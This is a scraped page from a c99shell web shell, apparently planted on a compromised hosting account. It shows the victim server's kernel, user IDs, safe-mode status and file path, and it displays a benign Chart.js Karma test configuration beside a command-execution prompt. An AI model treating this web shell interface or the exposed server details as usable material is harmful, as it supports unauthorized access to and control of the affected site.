Software: Apache. PHP/5.6.40 uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) Safe-mode: OFF (not secure) /home/cp949260/public_html/mophlawyer.com/ladiesmoph/moph_admin/bower_components/chart.js/ drwxr-xr-x |
Viewing file: Select action/file-type: /* eslint camelcase: 0 */ module.exports = function(karma) { var args = karma.args || {}; var config = { browsers: ['Firefox'], frameworks: ['browserify', 'jasmine'], reporters: ['progress', 'kjhtml'], preprocessors: { './test/jasmine.index.js': ['browserify'], './src/**/*.js': ['browserify'] }, browserify: { debug: true }, // These settings deal with browser disconnects. We had seen test flakiness from Firefox // [Firefox 56.0.0 (Linux 0.0.0)]: Disconnected (1 times), because no message in 10000 ms. // https://github.com/jasmine/jasmine/issues/1327#issuecomment-332939551 browserNoActivityTimeout: 60000, browserDisconnectTolerance: 3 }; // https://swizec.com/blog/how-to-run-javascript-tests-in-chrome-on-travis/swizec/6647 if (process.env.TRAVIS) { config.browsers.push('chrome_travis_ci'); config.customLaunchers = { chrome_travis_ci: { base: 'Chrome', flags: ['--no-sandbox'] } }; } else { config.browsers.push('Chrome'); } if (args.coverage) { config.reporters.push('coverage'); config.browserify.transform = ['browserify-istanbul']; // https://github.com/karma-runner/karma-coverage/blob/master/docs/configuration.md config.coverageReporter = { dir: 'coverage/', reporters: [ {type: 'html', subdir: 'report-html'}, {type: 'lcovonly', subdir: '.', file: 'lcov.info'} ] }; } karma.set(config); }; |
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 1.0608 ]-- |